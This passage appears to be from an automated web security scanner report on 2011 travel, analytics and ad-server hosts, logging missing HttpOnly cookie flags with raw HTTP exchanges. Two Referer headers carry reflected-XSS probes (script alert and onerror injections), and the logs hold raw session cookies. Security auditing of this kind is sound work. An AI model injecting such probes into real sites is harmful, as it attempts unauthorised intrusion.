92088&HP36=126.66&HTID37=362369&HP37=229.95&HTID38=283739&HP38=106.66&HTID39=281930&HP39=159.00&HTID40=392054&HP40=129.99&HTID41=279446&HP41=439.00&HTID42=280626&HP42=179.00&HTID43=291348&HP43=129.99&HTID44=299565&HP44=175.67&HTID45=302276&HP45=549.00&HTID46=362518&HP46=230.00&HTID47=287689&HP47=124.99&HTID48=345803&HP48=106.66&HTID49=562856&HP49=103.00&HTID50=287601&HP50=99.99 HTTP/1.1
Host: delivery.hotels.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.hotels.com/search.do?searchParams.arrivalDate=10-04-11&pointName&searchParams.departureDate=10-07-11&lon=0.0&queryFormState=CLOSED&monthCheckOut=10&fromHotelDetails=false&destination=Boston%2C&showSimilarDestinations=true&fromLandmark=false&searchParams.rooms[0].numberOfAdults=2&asaReport&dayInMonthCheckIn=4&fromDisambiguation=false&destinationForLandmark&monthCheckIn=10&activeTab=DESTINATION&dayInMonthCheckOut=7&lat=0.0&rooms=1&ppc=1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SSID=BQBsXxscAAAAAAAp_YhOsO4QAin9iE4BAAAAAAAAAAAAKf2ITgCCAAABgwQAACn9iE4BAIcAAAG0BAAAKf2ITgEA; SSSC=3.G5659051284361178800.1|130.1155:135.1204; SSRT=Kf2ITgA; SESSID=44777099D2E37148A35E76005853DABC.hm21tc04; guid=e206d102-4853-4dd2-9d9b-23d14562d0f1; channel=DC; SSLB=1; SSPV=EMAAAAAAAAAAAAAAAAAAAAAAAAEAAAAAAAA; homepage_search_data="Qm9zdG9uLA..//10/04/11//10/07/11//2//MM/dd/yy//1643195"; user=RCoxMjQuMS4wLmkxJTNBOTcuNzMuMS5pMyUzQTk4LjYuNCUzQTEzNy4wLjAuaTIlM0ExNDUuMC4wLmkyJTNBMTA4LjEuMC5pMiUzQTE1Mi4wLjAuaTIlM0ExOTYuMS4wJTNBOTIuMC4wLmkxJTNBMTIxLjUwMy4wLmk3JTNBMTk1LjAuMCUzQTEwNC4wLjElN0NIQ09NX1VTIUEqZW5fVVN8SENPTV9VUw..

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: application/x-javascript; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: UID=1961757583|1|0; expires=Tue, 02-Oct-2012 00:10:12 GMT; path=/
Set-Cookie: hl_upm=Y4E7n03ene2ZDIPTWpLM1HtSrQx1OyDdsY4KBK1Ss8UP/OJVjMn5RXwMzdzUolZoFNbG0LY/3mcZcj1YGkhYg9cf+1x7zjDp93dVTciqsDvIIF2mmYFd1RbFocYxB9o//yaseYy3OsV0S8C79JNlCVbfn5N53QGPKIW9FCknA/oIYfb3tgn5TXtpCoHoL5Zu2ExEwcU/MA/DwgQacyCqbkHdE577MIjt2DKh7MxWUmkvXndCU208bGgFm4Qs6PiVmjW45gH5UX/uhZ4lXzi0tTLmv38iaf58; expires=Thu, 02-Oct-2014 00:10:12 GMT; path=/
X-Powered-By: ASP.NET
p3p: CP="ALL DSP COR CUR ADMo DEVo PSAo PSDo IVDi OUR STP PRE"
Date: Mon, 03 Oct 2011 00:10:12 GMT
Connection: close

var th_InsType1=0;var th_InsType2=0;var th_InsType3=0;var th_InsType4=0;var th_InsType5=0;var th_InsType6=0;var th_InsertStart=new Date();var th_instanceArray=new Array();var THSearch = 3861123723;var
...[SNIP]...
14.140. http://dm.travelocity.com/js.ng/site=travelocity&cobrand=TRAVELOCITY&adsize=1x1&area=homepage&tile=990892811131760&transactionID=642711317600486&random=908927341317600  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dm.travelocity.com
Path:   /js.ng/site=travelocity&cobrand=TRAVELOCITY&adsize=1x1&area=homepage&tile=990892811131760&transactionID=642711317600486&random=908927341317600

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /js.ng/site=travelocity&cobrand=TRAVELOCITY&adsize=1x1&area=homepage&tile=990892811131760&transactionID=642711317600486&random=908927341317600 HTTP/1.1
Host: dm.travelocity.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.travelocity.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TVLY_GEO=|||||; tyrg1st=51B82D43BB8E25C5; SID=T000V00000X401118380170533249023416102

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:08:04 GMT
Server: Apache
X-Server: prdlmn0408
Set-Cookie: NGUserID=a1c4b0d-32323-499133968-1317600484; expires=Wednesday, 30-Dec-2037 16:00:00 GMT; path=/
AdServer: 10.28.75.14:9678:1
P3P: policyref="http://dm.travelocity.com/w3c/p3p.xml", CP="ALL DSP COR CUR ADM DEVo CONi OUR DEL IND PHY DEM ONL PRE INT PUR CNT UNI NAV COM"
Cache-Control: max-age=0, no-cache
Expires: Mon, 03 Oct 2011 00:08:04 GMT
Vary: Accept-Encoding,User-Agent
Pragma: no-cache
Content-Length: 1150
Content-Type: application/x-javascript

document.write('<a href=\"http://dm.travelocity.com/event.ng/Type=click&FlightID=131412&AdID=180775&TargetID=28645&ASeg=&AMod=&AOpt=0&Segments=1,9,24,3090,4384,5796,5848,9520,10495,11148,12670,20052,2
...[SNIP]...
14.141. http://ehg-twi.hitbox.com/HG  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ehg-twi.hitbox.com
Path:   /HG

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /HG?hc=&hb=DM55040895RD95EN3%3BDM5708060ANB71EN3&hec=1&vjs=HBX0201.03u&vpc=ERR&ec=1&err=Unknown HTTP/1.1
Host: ehg-twi.hitbox.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.mufoundation.org/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WSS_GW=V1z%X%@Q^^XCC; DM55040895RDV6=V1^Q(#X"rz%X%@Q^^XCCr@rQXCz%zrzCXi"%X%@Q^^XCCz%X%@Q^^XCC"%X%@Q^^@iB"%X%@Q^^XCCr@rQXC"%eBz(xB$DTdT:kTxBrGIWaxBiFxB^z7}z)O:ma6r"OuKr6%XzA6DTdT:kTHGIWaoF9; DM570806C8RAV6=V1@%(#X"rz%X%@Q^^XCCr@rQXCz%zrzCXi"%X%@Q^^XCCz%X%@Q^^XCC"%X%@Q^^@iB"%X%@Q^^XCCr@rQXC"%eBz(xB$DTdT:kTxBrGIWaxBiFxB^z7}z)OuKr6%XzA6DTdT:kTHGIWaoF9; CTG=1317599782

Response

HTTP/1.1 200 OK
Date: Sun, 02 Oct 2011 23:58:28 GMT
Server: Hitbox Gateway 9.3.6-rc1
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP LAW NID PSA ADM OUR IND NAV COM"
Set-Cookie: WSS_GW=V1z%X%@Q^^XCC; path=/; domain=.hitbox.com; expires=Mon, 01-Oct-2012 23:58:28 GMT; max-age=31536000
Set-Cookie: DM55040895RDV6=V1^Q(#X"rz%X%@Q^^XCCr@rQXCz%zrzQeC"%X%@Q^^XCCz%X%@Q^^XCC"%X%@Q^^^ri"%X%@Q^^XCCr@rQXC"%Bez(xB$DTdT:kTxBrGIWaxBiFxB^z7}z)O:ma6r"OuKr6%XzA6DTdT:kTHGIWaoF9; path=/; domain=ehg-twi.hitbox.com; expires=Mon, 01-Oct-2012 23:58:28 GMT; max-age=31536000
Set-Cookie: CTG=1317599908; path=/; domain=.hitbox.com; expires=Sun, 09-Oct-2011 23:58:28 GMT; max-age=604800
Set-Cookie: DM5708060ANBV6=V1@%(#X"rz%X%@Q^^^rir^rXQQz%zrzr"%X%@Q^^^riz%X%@Q^^^ri"%X%@Q^^^ri"%X%@Q^^^rir^rXQQ"rz(xB$DTdT:kTxBrGIWaxBiFxB^z7}z)OuKr6%%rzA6DTdT:kTHGIWaoF9; path=/; domain=ehg-twi.hitbox.com; expires=Mon, 01-Oct-2012 23:58:28 GMT; max-age=31536000
Cneonction: close
Pragma: no-cache
Vary: *
Cache-Control: no-cache, private, must-revalidate
Expires: Sun, 02 Oct 2011 23:58:29 GMT
Content-Type: image/gif
Content-Length: 43

GIF89a.............!.......,...........D..;
14.142. http://ehg-twi.hitbox.com/HG  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ehg-twi.hitbox.com
Path:   /HG

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /HG?hc=&hb=DM55040895RD95EN3%3BDM570806C8RA71EN3&hec=1&vjs=HBX0201.03u&vpc=ERR&ec=1&err=Unknown HTTP/1.1
Host: ehg-twi.hitbox.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.manutd.com/Splash-Page.aspx
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WSS_GW=V1z%X%@C@C%Xi; CTG=1317474165

Response

HTTP/1.1 200 OK
Date: Sun, 02 Oct 2011 23:49:05 GMT
Server: Hitbox Gateway 9.3.6-rc1
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP LAW NID PSA ADM OUR IND NAV COM"
Set-Cookie: WSS_GW=V1z%X%@Q^^XCC; path=/; domain=.hitbox.com; expires=Mon, 01-Oct-2012 23:49:05 GMT; max-age=31536000
Set-Cookie: DM55040895RDV6=V1^Q(#X"rz%X%@Q^^XCCr@rQXCz%zrz%"%X%@Q^^XCCz%X%@Q^^XCC"%X%@Q^^XCQ"%X%@Q^^XCCr@rQXC"%z(xB$DTdT:kTxBrGIWaxBiFxB^z7}z)O:ma6r"OuKr6%XzA6DTdT:kTHGIWaoF9; path=/; domain=ehg-twi.hitbox.com; expires=Mon, 01-Oct-2012 23:49:05 GMT; max-age=31536000
Set-Cookie: DM570806C8RAV6=V1@%(#X"rz%X%@Q^^XCCr@rQXCz%zrz%"%X%@Q^^XCCz%X%@Q^^XCC"%X%@Q^^XCQ"%X%@Q^^XCCr@rQXC"%z(xB$DTdT:kTxBrGIWaxBiFxB^z7}z)OuKr6%XzA6DTdT:kTHGIWaoF9; path=/; domain=ehg-twi.hitbox.com; expires=Mon, 01-Oct-2012 23:49:05 GMT; max-age=31536000
Set-Cookie: CTG=1317599345; path=/; domain=.hitbox.com; expires=Sun, 09-Oct-2011 23:49:05 GMT; max-age=604800
nnCoection: close
Pragma: no-cache
Vary: *
Cache-Control: no-cache, private, must-revalidate
Expires: Sun, 02 Oct 2011 23:49:06 GMT
Content-Type: image/gif
Content-Length: 43

GIF89a.............!.......,...........D..;
14.143. http://ehg-twi.hitbox.com/HGct  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ehg-twi.hitbox.com
Path:   /HGct

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /HGct?hc=&hb=DM55040895RD95EN3%3BDM570806C8RA71EN3&hec=1&vjs=HBX0201.03u&vpc=ERR&ec=1&err=Unknown HTTP/1.1
Host: ehg-twi.hitbox.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.manutd.com/Search-Results.aspx?qs=manutd_frontend&catTxt=&searchText=xss75931%3Cscript%3Ealert(document.location)%3C/script%3E14fb8fbf954
Cookie: WSS_GW=V1z%X%eCer@ir; CTG=1317599837

Response

HTTP/1.1 200 OK
Date: Sun, 02 Oct 2011 23:57:19 GMT
Server: Hitbox Gateway 9.3.6-rc1
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP LAW NID PSA ADM OUR IND NAV COM"
Set-Cookie: WSS_GW=V1z%X%@Q^^iXi; path=/; domain=.hitbox.com; expires=Mon, 01-Oct-2012 23:57:19 GMT; max-age=31536000
Set-Cookie: DM55040895RDV6=V1^Q(#X"rz%X%@Q^^iXieXr^%rz%zrz%"%X%@Q^^iXiz%X%@Q^^iXi"%X%@Q^^iX^"%X%@Q^^iXieXr^%r"%z(xB$DTdT:kTxBrGIWaxBiFxB^z7}z)O:ma6r"OuKr6%QzA6DTdT:kTHGIWaoF9; path=/; domain=ehg-twi.hitbox.com; expires=Mon, 01-Oct-2012 23:57:19 GMT; max-age=31536000
Set-Cookie: DM570806C8RAV6=V1@%(#X"rz%X%@Q^^iXieXr^%rz%zrz%"%X%@Q^^iXiz%X%@Q^^iXi"%X%@Q^^iX^"%X%@Q^^iXieXr^%r"%z(xB$DTdT:kTxBrGIWaxBiFxB^z7}z)OuKr6%QzA6DTdT:kTHGIWaoF9; path=/; domain=ehg-twi.hitbox.com; expires=Mon, 01-Oct-2012 23:57:19 GMT; max-age=31536000
Set-Cookie: CTG=1317599839; path=/; domain=.hitbox.com; expires=Sun, 09-Oct-2011 23:57:19 GMT; max-age=604800
nnCoection: close
Pragma: no-cache
Vary: *
Cache-Control: no-cache, private, must-revalidate
Expires: Sun, 02 Oct 2011 23:57:20 GMT
Content-Type: image/gif
Content-Length: 43

GIF89a.............!.......,...........D..;
14.144. http://extras.expedia.com/Hotels/Delivery/HSDirect.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://extras.expedia.com
Path:   /Hotels/Delivery/HSDirect.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Hotels/Delivery/HSDirect.aspx?thrn=1299437744&D=BOS&CI=20111004&CO=20111007&Eapid=0000&SID=1&RID=178239&pr=1&pa=1&Cr=&H=4215|15861|23415|1680030|2800816|4443|1450057|12244|17845|16067|15159|10391|560932|22961|20351|16680|903185|151201|16079|293|119162|980972|26283|2311712|22512&LAP=429.0|339.15|289.0|432.33|308.54|383.1|359.1|349.0|401.33|412.33|409.4|259.0|221.1|345.67|72.1|349.0|414.0|379.95|359.0|127.99|436.33|419.0|335.67|445.67|399.0&LTP=1287.00|1017.45|867.00|1297.00|925.60|1149.30|1077.30|1047.00|1204.00|1237.00|1228.21|777.00|663.30|1037.00|216.30|1047.00|1242.00|1139.85|1077.00|383.97|1309.00|1257.00|1007.00|1337.00|1197.00&HAP=449.00|509.15|289.00|432.33|388.54|401.10|407.33|399.00|437.33|462.33|429.91|259.00|221.10|345.67|72.10|349.00|614.00|429.95|389.00|159.99|436.33|419.00|335.67|525.67|459.00&HTP=1347.00|1527.45|867.00|1297.00|1165.60|1203.30|1222.00|1197.00|1312.00|1387.00|1289.74|777.00|663.30|1037.00|216.30|1047.00|1842.00|1289.85|1167.00|479.97|1309.00|1257.00|1007.00|1577.00|1377.00&Str=0&Si=0&vers=en&tid=1 HTTP/1.1
Host: extras.expedia.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.expedia.com/Hotel-Search?olacid=US.BD.IGOUGO-US.HOTEL.HOTEL&
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=GUID=CCF4A420AF8B480F8413EFB42E880287; COOKIECHECK=1; iEAPID=0000,; lsrc=v.1,10/16/2011; JSESSION=aa0f7acd-9a8d-4dba-a7c4-36d8d1ea2a11; s1=`0; p1=`tpid=v.1,1`linfo=v.4,|0|0|255|1|0||||||||1033|0|0||0|0|0|-1|-1`63; aspp=v.1,0|US.BD.IGOUGO-US.HOTEL.HOTEL|||||||||OLA|20111101|; U9Z5=CT-1

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: application/x-javascript; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: UID=1961758836|0|0; expires=Tue, 02-Oct-2012 00:10:59 GMT; path=/
Set-Cookie: expEAPID=0000; expires=Tue, 04-Oct-2011 00:10:59 GMT; path=/
Set-Cookie: hl_upm=Y4E7n03ene2ZDIPTWpLM1HtSrQx1OyDd5GFAnVqxZzRrIR6V8ksXrB+9RBTwy9+8cmuXkhnPx+FyF0r62+n6+GSuRa5+4ueCc+QkR1NB55VmEBCpjt+n/TvuY5xf9pFNiHIfvnm5NePpvDE+GrsXQEJKvNqFlYSaQW+re/5/GQH2seBJxXACZ7631o5Ado1kVl48f7csfT3c6loQl0QaGr+exqsZE8q6RN0qJ9Kmc82VZVBumioxbKldNopV86WTUYH0n5v3Toyx0+FBPR+W9VyVapTaQWQlqvxPP7vS71A=; expires=Thu, 02-Oct-2014 00:10:59 GMT; path=/
X-Powered-By: ASP.NET
p3p: CP="ALL DSP COR CUR ADMo DEVo PSAo PSDo IVDi OUR STP PRE"
Date: Mon, 03 Oct 2011 00:10:59 GMT
Connection: close

var gem3442live=document.getElementById("th_fee");var th_StaticStart=new Date();var th_StaticEnd=new Date();var th_ScrapeStart=new Date();var th_ScrapeEnd=new Date();var th_ScriptCounter=1;var th_QS=d
...[SNIP]...
14.145. http://extras.expedia.com/Hotels/Delivery/ISDirect.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://extras.expedia.com
Path:   /Hotels/Delivery/ISDirect.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Hotels/Delivery/ISDirect.aspx?thrn=749140340&Path=HOT&HN=The%20Boston%20Park%20Plaza%20Hotel%20%26%20Towers&HID=4215&SV=35&pr=1&CI=20111004&CO=20111007&pa=1&pc=0&ca=&RN=*Plaza%20Petite|*Standard%201%20King|*Standard%201%20Queen|*Standard%20-%202%20Doubles|*Deluxe%20room%20-%201%20King|*Towers%20Concierge%20Level|*Junior%20Suite|*One%20Bedroom%20Suite|XXXXDeluxe%20room%20for%204&AP=429|449|449|449|459|479|509|539|&P=1464.24|1532.49|1532.49|1532.49|1566.63|1634.88|1737.27|1839.67|&drid=800016&vers=en_US&sid=1&tpid=1&eapid=0000 HTTP/1.1
Host: extras.expedia.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.expedia.com/Boston-Hotels-The-Boston-Park-Plaza-Hotel-Towers.h4215.Hotel-Information?chkin=10%2F04%2F2011&chkout=10%2F07%2F2011&rm1=a1&hwrqCacheKey=ccf4a420-af8b-480f-8413-efb42e880287HWRQ&hashTag=roomsAndRates&rfrr=-5517&c=d20f4232-e339-420a-bcb4-97cad88f9b0f&&
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=GUID=CCF4A420AF8B480F8413EFB42E880287; COOKIECHECK=1; iEAPID=0000,; lsrc=v.1,10/16/2011; aspp=v.1,0|US.BD.IGOUGO-US.HOTEL.HOTEL|||||||||OLA|20111101|; U9Z5=0; MediaCookie=0`1034,1004,PDEST,BOS; UID=1961758836|0|0; expEAPID=0000; hl_upm=Y4E7n03ene2ZDIPTWpLM1HtSrQx1OyDd5GFAnVqxZzRrIR6V8ksXrB+9RBTwy9+8cmuXkhnPx+FyF0r62+n6+GSuRa5+4ueCc+QkR1NB55VmEBCpjt+n/TvuY5xf9pFNiHIfvnm5NePpvDE+GrsXQEJKvNqFlYSaQW+re/5/GQGfVDKyCDiLasL8etBXg4B54nFRYvqc8iEB0kzgXkvRpa4L0iza1xMJ5At9D9dKY+grPbSn0rU0CnQWUDm8aBkJovZzrkPbHrkYByqd2H1JuSrHF+eWCtZQlMXo5rYyQxc=; hl_ubm=YDnUkiZb5XknMSm4p9+V5cZHCQxkEJ6V6VqmAnOws77jT09l7gstFUSTh3JtzITB; s_vi=[CS]v1|27447EB905149286-6000018C4001272D[CE]; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; JSESSION=aa0f7acd-9a8d-4dba-a7c4-36d8d1ea2a11; s1=`0; p1=`tpid=v.1,1`linfo=v.4,|0|0|255|1|0||||||||1033|0|0||0|0|0|-1|-1`63

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: application/x-javascript; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: UID=1961758836|0|0; expires=Tue, 02-Oct-2012 00:14:21 GMT; path=/
Set-Cookie: hl_upm=Y4E7n03ene2ZDIPTWpLM1HtSrQx1OyDd5GFAnVqxZzRrIR6V8ksXrB+9RBTwy9+8cmuXkhnPx+FyF0r62+n6+OJVqE4d+vQFR8Ixpw0P5zmc6pxFtvXIc/qSb3VqRp1c5BGcsYrAdS3R5hmjeEGy+avm745VV7Cb76SeNa7T182quMzGEhkg18QQ3xFN/+jLYs+3i/jbPaF53+0nEdIRAazOIls9BR8Za2NApYCsP++rHkH+zOkoki5QOmwb5o//LhY/sOM+iALIai9w+nCppg/LkJdLONuU8vEW+S+/3O18rMvBLxepUR3keCc8j0PtXh7F4QANSI5ssc9aE4adnNlpQ6jojPmc9ovtSYWyrDoNUW/i7FJjiiOCJt0DP1MXbhnsCvgIxtUBdhnYhBYqLNPKlrRNC3sjwKPSiQ5Xuvs=; expires=Thu, 02-Oct-2014 00:14:21 GMT; path=/
X-Powered-By: ASP.NET
p3p: CP="ALL DSP COR CUR ADMo DEVo PSAo PSDo IVDi OUR STP PRE"
Date: Mon, 03 Oct 2011 00:14:21 GMT
Connection: close

var THSearch = 3028489027;var thSiteId = 1;
if(typeof th_domain=="undefined"){th_domain="extras.expedia.com"}var thProt=(window.location.protocol=="http:")?"http":"https";var thCoTxt={code:"UK",inlin
...[SNIP]...
14.146. http://ff.connextra.com/BlueSquare/selector/client  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ff.connextra.com
Path:   /BlueSquare/selector/client

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /BlueSquare/selector/client?client=BlueSquare&placement=Guardian_300x312_Football_Premiership HTTP/1.1
Host: ff.connextra.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.guardian.co.uk/football/manchester-united
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
X-Served-By: vm-pcxtad05.gs1.betgenius.com
P3P: CP=NOI DSP COR CURa ADMa DEVa PSAa PSDa OUR SAMa BUS IND UNI PUR COM NAV
Location: http://ff.connextra.com/servlet/controller?service=Guardian_300x312_Football_Premiership_v2&client=BlueSquare&placement=Guardian_300x312_Football_Premiership
Content-Length: 0
Expires: Sun, 02 Oct 2011 23:50:54 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 02 Oct 2011 23:50:54 GMT
Connection: close
Set-Cookie: FrequencyCappingCookie=; Domain=.connextra.com; Expires=Mon, 01-Oct-2012 23:50:54 GMT; Path=/BlueSquare
Set-Cookie: BlueSquare=A%7Cpostimpression%7C1%7C201110030050%7C7%7CGuardian_300x312_Football_Premiership%7CGuardian_300x312_Football_Premiership_v2%7C; Domain=.connextra.com; Expires=Mon, 01-Oct-2012 23:50:54 GMT; Path=/

14.147. http://googleads.g.doubleclick.net/pagead/viewthroughconversion/985248306/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/viewthroughconversion/985248306/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pagead/viewthroughconversion/985248306/?label=M6MLCJbtiQIQsuTm1QM5a299 HTTP/1.1
Accept: image/png, image/svg+xml, image/*;q=0.8, */*;q=0.5
Referer: http://www.agoda.com/pages/agoda/default/page_AdScript.aspx?type=R&pagetypeid=1&conversionID=985248306&conversionLabel=M6MLCJbtiQIQsuTm1QM5a299"onerror%3d"alert(1)"d0370ac32b&_=1317602266727
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: googleads.g.doubleclick.net
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Date: Mon, 03 Oct 2011 00:55:57 GMT
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Cache-Control: no-cache, must-revalidate
Content-Type: image/gif
Set-Cookie: test_cookie=CheckForPermission; expires=Mon, 03-Oct-2011 01:10:57 GMT; path=/; domain=.doubleclick.net
X-Content-Type-Options: nosniff
Server: cafe
Content-Length: 42
X-XSS-Protection: 1; mode=block

GIF89a.............!.......,...........D.;
14.148. http://i.w55c.net/ping_match.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://i.w55c.net
Path:   /ping_match.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ping_match.gif?ei=OPENX&rurl=http%3A%2F%2Fr.openx.net%2Fset%3Fpid%3D6f983c5f-b90f-c87c-2ba9-c74bb1f0f9ed%26rtb%3D_wfivefivec_ HTTP/1.1
Host: i.w55c.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://d.tradex.openx.com/afr.php?refresh=40&zoneid=6511&cb=INSERT_RANDOM_NUMBER_HERE&loc=
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: matchrubicon=1; matchbluekai=1; matchaccuen=1; matchadmeld=1; optout=1; matchpubmatic=1; matchcontextweb=1; matchadbrite=1; matchyahoo=1; matchgoogle=1; matchopenx=1; wfivefivec=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F

Response

HTTP/1.1 302 Found
Date: Sun, 02 Oct 2011 23:54:02 GMT
Server: Jetty(6.1.22)
Set-Cookie: wfivefivec=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F;Path=/;Domain=.w55c.net;Expires=Tue, 01-Oct-13 23:54:02 GMT
X-Version: DataXu Pixel Tracker v3
Cache-Control: private
Content-Length: 0
Location: http://r.openx.net/set?pid=6f983c5f-b90f-c87c-2ba9-c74bb1f0f9ed&rtb=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F
Via: 1.1 mdw061001 (MII-APC/2.1)
Content-Type: text/plain

14.149. http://image2.pubmatic.com/AdServer/Pug  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://image2.pubmatic.com
Path:   /AdServer/Pug

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /AdServer/Pug?vcode=bz0yJnR5cGU9MSZqcz0xJmNvZGU9MjE5MSZ0bD0yNTkyMDA=&piggybackCookie=-5675633421699857517= HTTP/1.1
Host: image2.pubmatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
